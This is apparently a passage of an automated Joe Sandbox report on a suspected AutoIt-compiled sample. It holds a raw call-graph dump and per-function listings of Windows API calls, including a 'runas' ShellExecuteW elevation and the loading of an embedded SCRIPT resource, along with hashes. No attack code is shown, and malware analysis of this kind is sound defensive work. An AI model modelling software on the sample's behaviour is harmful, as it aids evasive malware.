calls 98088->98131 98091 5135cc 98090->98091 98125 5135f3 98091->98125 98094 5135df 98094->98074 98096 514ecb 94 API calls 98095->98096 98097 5144cd 98096->98097 98098 553833 98097->98098 98100 514ecb 94 API calls 98097->98100 98099 582cf9 80 API calls 98098->98099 98101 553848 98099->98101 98102 5144e1 98100->98102 98103 55384c 98101->98103 98104 553869 98101->98104 98102->98098 98105 5144e9 98102->98105 98106 514f39 68 API calls 98103->98106 98107 52fe0b 22 API calls 98104->98107 98108 553854 98105->98108 98109 5144f5 98105->98109 98106->98108 98114 5538ae 98107->98114 98133 57da5a 82 API calls 98108->98133 98132 51940c 136 API calls 2 library calls 98109->98132 98112 512e31 98113 553862 98113->98104 98115 553a5f 98114->98115 98117 553a67 98114->98117 98118 51a4a1 22 API calls 98114->98118 98122 519cb3 22 API calls 98114->98122 98134 57967e 22 API calls __fread_nolock 98114->98134 98135 5795ad 42 API calls _wcslen 98114->98135 98136 580b5a 22 API calls 98114->98136 98137 513ff7 22 API calls 98114->98137 98115->98117 98116 514f39 68 API calls 98116->98117 98117->98116 98138 57989b 82 API calls __wsopen_s 98117->98138 98118->98114 98122->98114 98126 513605 98125->98126 98130 513624 __fread_nolock 98125->98130 98128 52fe0b 22 API calls 98126->98128 98127 52fddb 22 API calls 98129 51363b 98127->98129 98128->98130 98129->98094 98130->98127 98131->98088 98132->98112 98133->98113 98134->98114 98135->98114 98136->98114 98137->98114 98138->98117 98139 511044 98144 5110f3 98139->98144 98141 51104a 98180 5300a3 29 API calls __onexit 98141->98180 98143 511054 98181 511398 98144->98181 98148 51116a 98149 51a961 22 API calls 98148->98149 98150 511174 98149->98150 98151 51a961 22 API calls 98150->98151 98152 51117e 98151->98152 98153 51a961 22 API calls 98152->98153 98154 511188 98153->98154 98155 51a961 22 API calls 98154->98155 98156 5111c6 98155->98156 98157 51a961 22 API calls 98156->98157 98158 511292 98157->98158 98191 51171c 98158->98191 98162 5112c4 98163 51a961 22 API calls 98162->98163 98164 5112ce 98163->98164 98165 521940 9 API calls 98164->98165 98166 5112f9 98165->98166 98212 511aab 98166->98212 98168 511315 98169 511325 GetStdHandle 98168->98169 98170 552485 98169->98170 98171 51137a 98169->98171 98170->98171 98172 55248e 98170->98172 98174 511387 OleInitialize 98171->98174 98173 52fddb 22 API calls 98172->98173 98175 552495 98173->98175 98174->98141 98219 58011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98175->98219 98177 55249e 98220 580944 CreateThread 98177->98220 98179 5524aa CloseHandle 98179->98171 98180->98143 98221 5113f1 98181->98221 98184 5113f1 22 API calls 98185 5113d0 98184->98185 98186 51a961 22 API calls 98185->98186 98187 5113dc 98186->98187 98188 516b57 22 API calls 98187->98188 98189 511129 98188->98189 98190 511bc3 6 API calls 98189->98190 98190->98148 98192 51a961 22 API calls 98191->98192 98193 51172c 98192->98193 98194 51a961 22 API calls 98193->98194 98195 511734 98194->98195 98196 51a961 22 API calls 98195->98196 98197 51174f 98196->98197 98198 52fddb 22 API calls 98197->98198 98199 51129c 98198->98199 98200 511b4a 98199->98200 98201 511b58 98200->98201 98202 51a961 22 API calls 98201->98202 98203 511b63 98202->98203 98204 51a961 22 API calls 98203->98204 98205 511b6e 98204->98205 98206 51a961 22 API calls 98205->98206 98207 511b79 98206->98207 98208 51a961 22 API calls 98207->98208 98209 511b84 98208->98209 98210 52fddb 22 API calls 98209->98210 98211 511b96 RegisterWindowMessageW 98210->98211 98211->98162 98213 55272d 98212->98213 98214 511abb 98212->98214 98228 583209 23 API calls 98213->98228 98215 52fddb 22 API calls 98214->98215 98218 511ac3 98215->98218 98217 552738 98218->98168 98219->98177 98220->98179 98229 58092a 28 API calls 98220->98229 98222 51a961 22 API calls 98221->98222 98223 5113fc 98222->98223 98224 51a961 22 API calls 98223->98224 98225 511404 98224->98225 98226 51a961 22 API calls 98225->98226 98227 5113c6 98226->98227 98227->98184 98228->98217 98230 548402 98231 548418 98230->98231 98232 54842a 98231->98232 98234 550984 98231->98234 98237 550081 98234->98237 98236 55099f 98236->98232 98240 55008d ___scrt_is_nonwritable_in_current_image 98237->98240 98238 55009b 98295 53f2d9 20 API calls _free 98238->98295 98240->98238 98242 5500d4 98240->98242 98241 5500a0 98296 5427ec 26 API calls ___std_exception_copy 98241->98296 98248 55065b 98242->98248 98247 5500aa __fread_nolock 98247->98236 98298 55042f 98248->98298 98251 5506a6 98316 545221 98251->98316 98252 55068d 98330 53f2c6 20 API calls _free 98252->98330 98255 5506ab 98257 5506b4 98255->98257 98258 5506cb 98255->98258 98256 550692 98331 53f2d9 20 API calls _free 98256->98331 98332 53f2c6 20 API calls _free 98257->98332 98329 55039a CreateFileW 98258->98329 98262 5506b9 98333 53f2d9 20 API calls _free 98262->98333 98263 5500f8 98297 550121 LeaveCriticalSection __wsopen_s 98263->98297 98265 550781 GetFileType 98266 5507d3 98265->98266 98267 55078c GetLastError 98265->98267 98338 54516a 21 API calls 3 library calls 98266->98338 98336 53f2a3 20 API calls 2 library calls 98267->98336 98268 550756 GetLastError 98335 53f2a3 20 API calls 2 library calls 98268->98335 98271 550704 98271->98265 98271->98268 98334 55039a CreateFileW 98271->98334 98272 55079a CloseHandle 98272->98256 98274 5507c3 98272->98274 98337 53f2d9 20 API calls _free 98274->98337 98276 550749 98276->98265 98276->98268 98277 5507f4 98279 550840 98277->98279 98339 5505ab 72 API calls 4 library calls 98277->98339 98284 55086d 98279->98284 98340 55014d 72 API calls 4 library calls 98279->98340 98280 5507c8 98280->98256 98283 550866 98283->98284 98285 55087e 98283->98285 98286 5486ae __wsopen_s 29 API calls 98284->98286 98285->98263 98287 5508fc CloseHandle 98285->98287 98286->98263 98341 55039a CreateFileW 98287->98341 98289 550927 98290 550931 GetLastError 98289->98290 98291 55095d 98289->98291 98342 53f2a3 20 API calls 2 library calls 98290->98342 98291->98263 98293 55093d 98343 545333 21 API calls 3 library calls 98293->98343 98295->98241 98296->98247 98297->98247 98299 55046a 98298->98299 98300 550450 98298->98300 98344 5503bf 98299->98344 98300->98299 98351 53f2d9 20 API calls _free 98300->98351 98303 55045f 98352 5427ec 26 API calls ___std_exception_copy 98303->98352 98305 5504a2 98306 5504d1 98305->98306 98353 53f2d9 20 API calls _free 98305->98353 98315 550524 98306->98315 98355 53d70d 26 API calls 2 library calls 98306->98355 98309 5504c6 98354 5427ec 26 API calls ___std_exception_copy 98309->98354 98310 55051f 98311 55059e 98310->98311 98310->98315 98356 5427fc 11 API calls _abort 98311->98356 98314 5505aa 98315->98251 98315->98252 98317 54522d ___scrt_is_nonwritable_in_current_image 98316->98317 98359 542f5e EnterCriticalSection 98317->98359 98319 545234 98321 545259 98319->98321 98325 5452c7 EnterCriticalSection 98319->98325 98328 54527b 98319->98328 98322 545000 __wsopen_s 21 API calls 98321->98322 98323 54525e 98322->98323 98323->98328 98363 545147 EnterCriticalSection 98323->98363 98324 5452a4 __fread_nolock 98324->98255 98327 5452d4 LeaveCriticalSection 98325->98327 98325->98328 98327->98319 98360 54532a 98328->98360 98329->98271 98330->98256 98331->98263 98332->98262 98333->98256 98334->98276 98335->98256 98336->98272 98337->98280 98338->98277 98339->98279 98340->98283 98341->98289 98342->98293 98343->98291 98346 5503d7 98344->98346 98345 5503f2 98345->98305 98346->98345 98357 53f2d9 20 API calls _free 98346->98357 98348 550416 98358 5427ec 26 API calls ___std_exception_copy 98348->98358 98350 550421 98350->98305 98351->98303 98352->98299 98353->98309 98354->98306 98355->98310 98356->98314 98357->98348 98358->98350 98359->98319 98364 542fa6 LeaveCriticalSection 98360->98364 98362 545331 98362->98324 98363->98328 98364->98362 98365 562a00 98391 51d7b0 messages 98365->98391 98366 51db11 PeekMessageW 98366->98391 98367 51d807 GetInputState 98367->98366 98367->98391 98368 561cbe TranslateAcceleratorW 98368->98391 98370 51db8f PeekMessageW 98370->98391 98371 51da04 timeGetTime 98371->98391 98372 51db73 TranslateMessage DispatchMessageW 98372->98370 98373 51dbaf Sleep 98385 51dbc0 98373->98385 98374 562b74 Sleep 98374->98385 98375 52e551 timeGetTime 98375->98385 98376 561dda timeGetTime 98426 52e300 23 API calls 98376->98426 98379 562c0b GetExitCodeProcess 98380 562c37 CloseHandle 98379->98380 98381 562c21 WaitForSingleObject 98379->98381 98380->98385 98381->98380 98381->98391 98382 562a31 98386 51d9d5 98382->98386 98383 5a29bf GetForegroundWindow 98383->98385 98385->98375 98385->98379 98385->98382 98385->98383 98385->98386 98387 562ca9 Sleep 98385->98387 98385->98391 98429 595658 23 API calls 98385->98429 98430 57e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98385->98430 98431 57d4dc 47 API calls 98385->98431 98387->98391 98391->98366 98391->98367 98391->98368 98391->98370 98391->98371 98391->98372 98391->98373 98391->98374 98391->98376 98391->98386 98393 51ec40 235 API calls 98391->98393 98394 521310 235 API calls 98391->98394 98395 51bf40 235 API calls 98391->98395 98397 51dfd0 98391->98397 98420 52edf6 98391->98420 98425 51dd50 235 API calls 98391->98425 98427 583a2a 23 API calls 98391->98427 98428 58359c 82 API calls __wsopen_s 98391->98428 98393->98391 98394->98391 98395->98391 98399 51e010 98397->98399 98398 51ec40 235 API calls 98415 51e0dc messages 98398->98415 98399->98415 98434 530242 5 API calls __Init_thread_wait 98399->98434 98402 562fca 98404 51a961 22 API calls 98402->98404 98402->98415 98403 51a961 22 API calls 98403->98415 98405 562fe4 98404->98405 98435 5300a3 29 API calls __onexit 98405->98435 98409 562fee 98436 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98409->98436 98412 58359c 82 API calls 98412->98415 98414 51a8c7 22 API calls 98414->98415 98415->98398 98415->98403 98415->98412 98415->98414 98416 51e3e1 98415->98416 98417 5204f0 22 API calls 98415->98417 98432 51a81b 41 API calls 98415->98432 98433 52a308 235 API calls 98415->98433 98437 530242 5 API calls __Init_thread_wait 98415->98437 98438 5300a3 29 API calls __onexit 98415->98438 98439 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98415->98439 98440 5947d4 235 API calls 98415->98440 98441 5968c1 235 API calls 98415->98441 98416->98391 98417->98415 98421 52ee09 98420->98421 98422 52ee12 98420->98422 98421->98391 98422->98421 98423 52ee36 IsDialogMessageW 98422->98423 98424 56efaf GetClassLongW 98422->98424 98423->98421 98423->98422 98424->98422 98424->98423 98425->98391 98426->98391 98427->98391 98428->98391 98429->98385 98430->98385 98431->98385 98432->98415 98433->98415 98434->98402 98435->98409 98436->98415 98437->98415 98438->98415 98439->98415 98440->98415 98441->98415 98442 563a41 98446 5810c0 98442->98446 98444 563a4c 98445 5810c0 53 API calls 98444->98445 98445->98444 98448 5810cd 98446->98448 98453 5810fa 98446->98453 98447 5810fc 98458 52fa11 53 API calls 98447->98458 98448->98447 98449 581101 98448->98449 98448->98453 98455 5810f4 98448->98455 98451 517510 53 API calls 98449->98451 98452 581108 98451->98452 98454 516350 22 API calls 98452->98454 98453->98444 98454->98453 98457 51b270 39 API calls 98455->98457 98457->98453 98458->98449 98459 511cad SystemParametersInfoW

                                                                                                                        Executed Functions

                                                                                                                        Function 005142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 234 5142de-51434d call 51a961 GetVersionExW call 516b57 239 553617-55362a 234->239 240 514353 234->240 242 55362b-55362f 239->242 241 514355-514357 240->241 243 553656 241->243 244 51435d-5143bc call 5193b2 call 5137a0 241->244 245 553631 242->245 246 553632-55363e 242->246 250 55365d-553660 243->250 263 5143c2-5143c4 244->263 264 5537df-5537e6 244->264 245->246 246->242 247 553640-553642 246->247 247->241 249 553648-55364f 247->249 249->239 252 553651 249->252 253 553666-5536a8 250->253 254 51441b-514435 GetCurrentProcess IsWow64Process 250->254 252->243 253->254 258 5536ae-5536b1 253->258 256 514494-51449a 254->256 257 514437 254->257 260 51443d-514449 256->260 257->260 261 5536b3-5536bd 258->261 262 5536db-5536e5 258->262 265 553824-553828 GetSystemInfo 260->265 266 51444f-51445e LoadLibraryA 260->266 267 5536bf-5536c5 261->267 268 5536ca-5536d6 261->268 270 5536e7-5536f3 262->270 271 5536f8-553702 262->271 263->250 269 5143ca-5143dd 263->269 272 553806-553809 264->272 273 5537e8 264->273 278 514460-51446e GetProcAddress 266->278 279 51449c-5144a6 GetSystemInfo 266->279 267->254 268->254 280 5143e3-5143e5 269->280 281 553726-55372f 269->281 270->254 274 553715-553721 271->274 275 553704-553710 271->275 276 5537f4-5537fc 272->276 277 55380b-55381a 272->277 282 5537ee 273->282 274->254 275->254 276->272 277->282 285 55381c-553822 277->285 278->279 286 514470-514474 GetNativeSystemInfo 278->286 287 514476-514478 279->287 288 55374d-553762 280->288 289 5143eb-5143ee 280->289 283 553731-553737 281->283 284 55373c-553748 281->284 282->276 283->254 284->254 285->276 286->287 294 514481-514493 287->294 295 51447a-51447b FreeLibrary 287->295 292 553764-55376a 288->292 293 55376f-55377b 288->293 290 553791-553794 289->290 291 5143f4-51440f 289->291 290->254 298 55379a-5537c1 290->298 296 514415 291->296 297 553780-55378c 291->297 292->254 293->254 295->294 296->254 297->254 299 5537c3-5537c9 298->299 300 5537ce-5537da 298->300 299->254 300->254
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0051430D
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        • GetCurrentProcess.KERNEL32(?,005ACB64,00000000,?,?), ref: 00514422
                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00514429
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00514454
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00514466
                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00514474
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0051447B
                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 005144A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                        • API String ID: 3290436268-3101561225
                                                                                                                        • Opcode ID: 9c8305d5dcf685a4b0f12ecb36f2286912806a6685b9f5acf30200da6524060d
                                                                                                                        • Instruction ID: ac8a0bbb934b3f79df29d2195ded40d43c13280d5240523b76426081269d0183
                                                                                                                        • Opcode Fuzzy Hash: 9c8305d5dcf685a4b0f12ecb36f2286912806a6685b9f5acf30200da6524060d
                                                                                                                        • Instruction Fuzzy Hash: 7FA1E47190AAC0CFDB19C7697CC01D97FA57B3E780B285C99D4C59BA22D2704A4CEB39
                                                                                                                        Function 005142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1147 5142a2-5142ba CreateStreamOnHGlobal 1148 5142da-5142dd 1147->1148 1149 5142bc-5142d3 FindResourceExW 1147->1149 1150 5142d9 1149->1150 1151 5535ba-5535c9 LoadResource 1149->1151 1150->1148 1151->1150 1152 5535cf-5535dd SizeofResource 1151->1152 1152->1150 1153 5535e3-5535ee LockResource 1152->1153 1153->1150 1154 5535f4-553612 1153->1154 1154->1150
                                                                                                                        APIs
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005150AA,?,?,00000000,00000000), ref: 005142B2
                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005150AA,?,?,00000000,00000000), ref: 005142C9
                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,005150AA,?,?,00000000,00000000,?,?,?,?,?,?,00514F20), ref: 005535BE
                                                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,005150AA,?,?,00000000,00000000,?,?,?,?,?,?,00514F20), ref: 005535D3
                                                                                                                        • LockResource.KERNEL32(005150AA,?,?,005150AA,?,?,00000000,00000000,?,?,?,?,?,?,00514F20,?), ref: 005535E6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                        • String ID: SCRIPT
                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                        • Opcode ID: 48154616b0d3bdbeceac9f668d8d361e85e1801ac70b02415dabd46cd6e3cbc2
                                                                                                                        • Instruction ID: e5e0dc8853f89fc7c25ddc1ad19a9260f9aa9c733a047f7e9c79c4dffda4c798
                                                                                                                        • Opcode Fuzzy Hash: 48154616b0d3bdbeceac9f668d8d361e85e1801ac70b02415dabd46cd6e3cbc2
                                                                                                                        • Instruction Fuzzy Hash: B6117C78200701BFE7218B65DC48F677FBAFFD6B51F108169B41296250DB71D8449A20
                                                                                                                        Function 00552BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00512B6B
                                                                                                                          • Part of subcall function 00513A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005E1418,?,00512E7F,?,?,?,00000000), ref: 00513A78
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,005D2224), ref: 00552C10
                                                                                                                        • ShellExecuteW.SHELL32(00000000,?,?,005D2224), ref: 00552C17
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                        • String ID: runas
                                                                                                                        • API String ID: 448630720-4000483414
                                                                                                                        • Opcode ID: 98730347d5b5bd1fce657f2e94f2e3d5840bf669723e37c63e8fe86b9226d005
                                                                                                                        • Instruction ID: f702cb7e64c365209b1356b3a388479cdc678667a0ed7ac8af206a66260bd42c
                                                                                                                        • Opcode Fuzzy Hash: 98730347d5b5bd1fce657f2e94f2e3d5840bf669723e37c63e8fe86b9226d005
                                                                                                                        • Instruction Fuzzy Hash: C411E7311083426AEB14FF20D8699FD7FA4BFE1351F04082EF182421A2CF318AC9D712
                                                                                                                        Function 0057DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,00555222), ref: 0057DBCE
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 0057DBDD
                                                                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0057DBEE
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057DBFA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2695905019-0
                                                                                                                        • Opcode ID: d667dd7003aae2d823655a1aedfb75caaccad058711674bbbda24ed44d2af4e7
                                                                                                                        • Instruction ID: f0e16c42470e8858e4035df2d2e7cfdca5165d8050b9322c8c5084dd2548bc3d
                                                                                                                        • Opcode Fuzzy Hash: d667dd7003aae2d823655a1aedfb75caaccad058711674bbbda24ed44d2af4e7
                                                                                                                        • Instruction Fuzzy Hash: 36F0A0308109105783216B78AC0D8AA3FBCAF42334B108702F87AC20E0EBB05D58EAA5
                                                                                                                        Function 0051BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID: p#^
                                                                                                                        • API String ID: 3964851224-2580200144
                                                                                                                        • Opcode ID: da08b284cfe9d5792e27d6932bb606c7ff6ffc62423d2bc19e3bc892eecc9722
                                                                                                                        • Instruction ID: 180d47d191b079c4de38bfffd8ad49dc2cea871e64a4e535c356fef6e14eddb3
                                                                                                                        • Opcode Fuzzy Hash: da08b284cfe9d5792e27d6932bb606c7ff6ffc62423d2bc19e3bc892eecc9722
                                                                                                                        • Instruction Fuzzy Hash: 0DA26B706083419FD714DF18C484B6ABFE1BF89304F14896DE89A9B392D772EC85CB92
                                                                                                                        Function 0051D730 Relevance: 21.6, APIs: 14, Instructions: 627windowsleeptimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetInputState.USER32 ref: 0051D807
                                                                                                                        • timeGetTime.WINMM ref: 0051DA07
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051DB28
                                                                                                                        • TranslateMessage.USER32(?), ref: 0051DB7B
                                                                                                                        • DispatchMessageW.USER32(?), ref: 0051DB89
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051DB9F
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0051DBB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2189390790-0
                                                                                                                        • Opcode ID: 84032f4830fc25d687439e4001965fa2da576e7e0db77a18d3186251d6427bb1
                                                                                                                        • Instruction ID: fd57dc7d5e94747b1b16466e0e835fa13b7976316c91f25d005dd059956decd9
                                                                                                                        • Opcode Fuzzy Hash: 84032f4830fc25d687439e4001965fa2da576e7e0db77a18d3186251d6427bb1
                                                                                                                        • Instruction Fuzzy Hash: EE42C5706087429FE728CF24C888BAABFF4BF95304F14495DE4958B291D774E884DFA2
                                                                                                                        Function 00512CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00512D07
                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00512D31
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00512D42
                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00512D5F
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00512D6F
                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00512D85
                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00512D94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                        • Opcode ID: 05a03a51e42841c1cd0665a3e8ae9cb0c71c7fa4468e5983488920ca7cf30ad6
                                                                                                                        • Instruction ID: f143d0c6b0c80f3b561a8e98a00846a8f3dcc9a9066f4841c4aa78f998568ed5
                                                                                                                        • Opcode Fuzzy Hash: 05a03a51e42841c1cd0665a3e8ae9cb0c71c7fa4468e5983488920ca7cf30ad6
